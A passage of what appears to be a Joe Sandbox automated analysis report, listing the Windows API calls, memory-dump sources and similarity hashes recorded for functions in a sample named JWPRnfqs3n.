                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                            • String ID:
                                                                            • API String ID: 2108273632-0
                                                                            • Opcode ID: 05863a0ca65dad14a150aadc62f1986de9898840a74c56b98f12bab0b48d9052
                                                                            • Instruction ID: 8e3907cd551dcbeb87bd811e3d01d8bae9cff225a02ff7fd11ea7bee90ef004f
                                                                            • Opcode Fuzzy Hash: 05863a0ca65dad14a150aadc62f1986de9898840a74c56b98f12bab0b48d9052
                                                                            • Instruction Fuzzy Hash: 7F317E31A00646AEDB64CFB4DC44FA67BB8FB01306F940165E921C35A1F735A8EDDBA4
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00858A30
                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 00858ADA
                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00858AE2
                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 00858AF0
                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00858AF8
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: 5a7952c534f17b7d813ae362315f83a8cb489f1c3116c342ca713ccb8b453800
                                                                            • Instruction ID: 868e27c8b2bb2480a05904f23fe267368083de2c0752ed7d53a48a7eb77ed5da
                                                                            • Opcode Fuzzy Hash: 5a7952c534f17b7d813ae362315f83a8cb489f1c3116c342ca713ccb8b453800
                                                                            • Instruction Fuzzy Hash: 5831BF71500229EFDF14CFA8D94DA9E3BB5FB04316F10822AF925E71D1D7B09918DB91
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 0085B204
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0085B221
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0085B259
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0085B27F
                                                                            • _wcsstr.LIBCMT ref: 0085B289
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                            • String ID:
                                                                            • API String ID: 3902887630-0
                                                                            • Opcode ID: cf20dd940da6e970e152b7af6329c6fadedcf66fb6f88f0cd388f8689569e7df
                                                                            • Instruction ID: c1168932d84f64601e069d52673dbc61845ca165024d4accc2f0eeac70a0ba43
                                                                            • Opcode Fuzzy Hash: cf20dd940da6e970e152b7af6329c6fadedcf66fb6f88f0cd388f8689569e7df
                                                                            • Instruction Fuzzy Hash: 2E212531204214BAEB259B39AC09E7F7B98FF59721F104129FC04CA1A2EF61CC809760
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0088B192
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0088B1B7
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0088B1CF
                                                                            • GetSystemMetrics.USER32(00000004), ref: 0088B1F8
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00870E90,00000000), ref: 0088B216
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 2294984445-0
                                                                            • Opcode ID: 0ce3cc4fc233fe4c25b1b43445c3e000d7af35611c94d3cdee880162988b591a
                                                                            • Instruction ID: 8ba0e897a904182b942a938056317a8d7838ae83ec277cf549afe023a8bd4b3e
                                                                            • Opcode Fuzzy Hash: 0ce3cc4fc233fe4c25b1b43445c3e000d7af35611c94d3cdee880162988b591a
                                                                            • Instruction Fuzzy Hash: 1E21B271A10655AFCB20AF78DC18A6A3BA4FB55321F144738FD32D71E1E7309861CB90
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00859320
                                                                              • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859352
                                                                            • __itow.LIBCMT ref: 0085936A
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00859392
                                                                            • __itow.LIBCMT ref: 008593A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow$_memmove
                                                                            • String ID:
                                                                            • API String ID: 2983881199-0
                                                                            • Opcode ID: 6c263dbc4926ba099bccc8cba0dc1eaa37ca4988c0db8982bd7586df90192e59
                                                                            • Instruction ID: 8d5aea6465166369452de3110c56d8298706ed5fde78379c968957ca28a893db
                                                                            • Opcode Fuzzy Hash: 6c263dbc4926ba099bccc8cba0dc1eaa37ca4988c0db8982bd7586df90192e59
                                                                            • Instruction Fuzzy Hash: 4121F531B00208FBDB10AA688C89EEE7BACFB58711F045065FE84D73D1E6B09D498792
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00875A6E
                                                                            • GetForegroundWindow.USER32 ref: 00875A85
                                                                            • GetDC.USER32(00000000), ref: 00875AC1
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00875ACD
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00875B08
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: c9e603921011496cb68437148ffaea157a5a6c263cf158c0fd9feb6499819ab1
                                                                            • Instruction ID: e23e44190cb87cbd8350fd272b716da9251b648b9d1093b991ee663c30de7891
                                                                            • Opcode Fuzzy Hash: c9e603921011496cb68437148ffaea157a5a6c263cf158c0fd9feb6499819ab1
                                                                            • Instruction Fuzzy Hash: CE218B35A00214AFDB00EF68DC88AAABBE5FF48310F14C179E949D7362DA70EC00CB91
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0080134D
                                                                            • SelectObject.GDI32(?,00000000), ref: 0080135C
                                                                            • BeginPath.GDI32(?), ref: 00801373
                                                                            • SelectObject.GDI32(?,00000000), ref: 0080139C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 7ddfed21e059697cad7341c68b8d779f7af8929821d21e9ae836541efb7845b3
                                                                            • Instruction ID: ed435448e5cd4fa4c192e73fa53bcfd5a9e71dc319e4d5f14ba2091806b16a2d
                                                                            • Opcode Fuzzy Hash: 7ddfed21e059697cad7341c68b8d779f7af8929821d21e9ae836541efb7845b3
                                                                            • Instruction Fuzzy Hash: 25215930800A08EFDF119F29DC48B6A7BB8FB10761F644226F810D62F1DB74A891DF91
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: a814e13c129d4a28fc2794a481ded6521ef9f16fe3df0c5c0f60f2b5d6a61be0
                                                                            • Instruction ID: feef86b9f25f1853c4c170d4ee8ffccca6c5cae8c0a2d25c10a78e6b73c53c3d
                                                                            • Opcode Fuzzy Hash: a814e13c129d4a28fc2794a481ded6521ef9f16fe3df0c5c0f60f2b5d6a61be0
                                                                            • Instruction Fuzzy Hash: 280192716001197BDA047B15AD42FBBB75DFF7039DF184021FD19D6342EB54DE1482A9
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00864ABA
                                                                            • __beginthreadex.LIBCMT ref: 00864AD8
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00864AED
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00864B03
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00864B0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 3824534824-0
                                                                            • Opcode ID: e71b825053d185700046ad616e92195317b359dfb94caa0b713eca56bc65b52f
                                                                            • Instruction ID: 96475fb852d78ba6919c082db01bd71daac94a89df80663e283a0346db916f0f
                                                                            • Opcode Fuzzy Hash: e71b825053d185700046ad616e92195317b359dfb94caa0b713eca56bc65b52f
                                                                            • Instruction Fuzzy Hash: E6114076908218BBCB018FACEC08E9F7FACFB45320F154269F925D32A1D674D9408BA0
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0085821E
                                                                            • GetLastError.KERNEL32(?,00857CE2,?,?,?), ref: 00858228
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00857CE2,?,?,?), ref: 00858237
                                                                            • HeapAlloc.KERNEL32(00000000,?,00857CE2,?,?,?), ref: 0085823E
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00858255
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            • Opcode ID: 6a6e40900e2d41f920321a7ebcc3206eb3d3959d9d208970fd955efbfdd42d8f
                                                                            • Instruction ID: d9ebd32212d901cd73cfba85be254bb4ff48d215bfa3135c85abc4680c10e7e3
                                                                            • Opcode Fuzzy Hash: 6a6e40900e2d41f920321a7ebcc3206eb3d3959d9d208970fd955efbfdd42d8f
                                                                            • Instruction Fuzzy Hash: 92014675200204EFDB208FAADC88D6B7FACFF9A756F50052AF909D2220DA318C14CB60
                                                                            APIs
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?,?,00857455), ref: 00857127
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?), ref: 00857142
                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?), ref: 00857150
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?), ref: 00857160
                                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00857044,80070057,?,?), ref: 0085716C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3897988419-0
                                                                            • Opcode ID: 426a562b8bbeefa3b4a5fa51bdd83c337fb4f25daf991da5a8988d73da87949d
                                                                            • Instruction ID: b74576a230b12f65d6cbda314ac0e4bd79c9191ee4fffc2ed4a7023427958eff
                                                                            • Opcode Fuzzy Hash: 426a562b8bbeefa3b4a5fa51bdd83c337fb4f25daf991da5a8988d73da87949d
                                                                            • Instruction Fuzzy Hash: 2A018F72601619BBDB114F69EC44BAA7BADFF48792F148078FE04D2221EB31DD449BA0
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865260
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0086526E
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00865276
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00865280
                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008652BC
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: a0f5cd344a5c0e8a62ab94390395c6fdf5cd489d9b83c15ca27ed08e5248ec43
                                                                            • Instruction ID: 27c26058e424a12ffbe2ff7c19bab39167ae1bc375c7802628a892dc8f9d335b
                                                                            • Opcode Fuzzy Hash: a0f5cd344a5c0e8a62ab94390395c6fdf5cd489d9b83c15ca27ed08e5248ec43
                                                                            • Instruction Fuzzy Hash: 51016935D01A2DDBCF00EFE8EC98AEDBB78FB09711F420456EA41F2241CB30555087A1
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858121
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0085812B
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0085813A
                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00858141
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858157
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 1764e7c3c9f7d2c7e37326f8d390fe087ca66729950041b03bc5c01cbe92284f
                                                                            • Instruction ID: c5e79cc090830bcf725f8005db424d0e08c922595e0de9364a10f930922bc8b4
                                                                            • Opcode Fuzzy Hash: 1764e7c3c9f7d2c7e37326f8d390fe087ca66729950041b03bc5c01cbe92284f
                                                                            • Instruction Fuzzy Hash: 0BF0C274240704EFEB120FA9EC8CE673BACFF49755F500026FA45D2151DB609C05DB60
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 0085C1F7
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0085C20E
                                                                            • MessageBeep.USER32(00000000), ref: 0085C226
                                                                            • KillTimer.USER32(?,0000040A), ref: 0085C242
                                                                            • EndDialog.USER32(?,00000001), ref: 0085C25C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: 775f5326922055e93abb1320e9efc961f026959adcd33b6fab137c65ff27061c
                                                                            • Instruction ID: 05c9559eb3b6c41ffcdd8eeea9c1654cf896531e4619c372fc740abd71496aab
                                                                            • Opcode Fuzzy Hash: 775f5326922055e93abb1320e9efc961f026959adcd33b6fab137c65ff27061c
                                                                            • Instruction Fuzzy Hash: C2018B305047049BEB209B54DD4EF967778FF10707F000669FA52E14E1DBF469989F50
                                                                            APIs
                                                                            • EndPath.GDI32(?), ref: 008013BF
                                                                            • StrokeAndFillPath.GDI32(?,?,0083B888,00000000,?), ref: 008013DB
                                                                            • SelectObject.GDI32(?,00000000), ref: 008013EE
                                                                            • DeleteObject.GDI32 ref: 00801401
                                                                            • StrokePath.GDI32(?), ref: 0080141C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: 25d5db6bafcfba5d5485972d90b053856879ea89e16492082fd912d3a08fe6ef
                                                                            • Instruction ID: 5d05edf4ad257f72b2dfa276c395b266e09ce4701d1822b65afdd0da70c233a8
                                                                            • Opcode Fuzzy Hash: 25d5db6bafcfba5d5485972d90b053856879ea89e16492082fd912d3a08fe6ef
                                                                            • Instruction Fuzzy Hash: 02F0C430004A08EFDF525F2AEC4CB593BB5FB11326F188234E529891F2CB3599A5DF54
                                                                            APIs
                                                                              • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                                              • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                              • Part of subcall function 00807A51: _memmove.LIBCMT ref: 00807AAB
                                                                            • __swprintf.LIBCMT ref: 00812ECD
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00812D66
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 1943609520-557222456
                                                                            • Opcode ID: d34c5713fad29123c28023872fe540c0443df6b3242699dd5af27bf5e38d8cfc
                                                                            • Instruction ID: 275dc50031a3f2983f706be68cd186a1fd463cd7f426da5d7cede5d995a853f7
                                                                            • Opcode Fuzzy Hash: d34c5713fad29123c28023872fe540c0443df6b3242699dd5af27bf5e38d8cfc
                                                                            • Instruction Fuzzy Hash: B5916B715082159FCB14EF28D885CAFB7A8FF95720F00491DF495DB2A2EA20ED94CB53
                                                                            APIs
